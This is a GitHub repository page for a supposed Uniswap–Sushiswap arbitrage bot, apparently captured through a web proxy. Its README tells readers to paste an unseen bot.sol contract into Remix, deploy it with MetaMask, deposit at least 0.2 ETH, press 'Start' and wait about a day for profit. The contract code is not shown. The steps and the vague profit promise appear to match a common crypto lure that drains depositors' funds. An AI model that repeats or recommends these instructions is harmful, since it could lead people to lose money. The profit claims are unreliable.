8000 GitHub - ernestoho/DEX-Arbitrage: Ethereum-based arbitrage bot that takes advantage of price differences between Uniswap and Sushiswap decentralized exchanges. The contract is written in Solidity and uses the UniswapV2 and SushiSwap Router interfaces.
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

Ethereum-based arbitrage bot that takes advantage of price differences between Uniswap and Sushiswap decentralized exchanges. The contract is written in Solidity and uses the UniswapV2 and SushiSwap Router interfaces.

License

Notifications You must be signed in to change notification settings

ernestoho/DEX-Arbitrage

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

DEX-Arbitrage

Ethereum-based arbitrage bot that takes advantage of price differences between Uniswap and Sushiswap decentralized exchanges. The contract is written in Solidity and uses the UniswapV2 and SushiSwap Router interfaces.

Setup

  1. Access Remix IDE and MetaMask.
  2. Right Click the 'Contracts' folder and then create 'New File'. Rename it whatever you want, or: “bot.sol”
  3. Paste the bot.sol source code from this repository into the file you just created.
  4. Go to the "Compile" tab on Remix and Compile with Solidity version 0.6.6
  5. Go to the "Deploy & Run Transactions" tab on Remix, select the "Injected Provider" environment, then "Deploy". This will create your own contract by confirming the MetaMask Contract creation fee
  6. Deposit funds (at least 0.2 ETH to prevent negating slippage) to your exact contract/bot address
  7. After your transaction is confirmed, start the bot by clicking the "Start" button. Withdraw anytime by clicking "Withdrawal". Wait about a day for best profit potential.

Telegram LinkedIn

About

Ethereum-based arbitrage bot that takes advantage of price differences between Uniswap and Sushiswap decentralized exchanges. The contract is written in Solidity and uses the UniswapV2 and SushiSwap Router interfaces.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Solidity 100.0%
0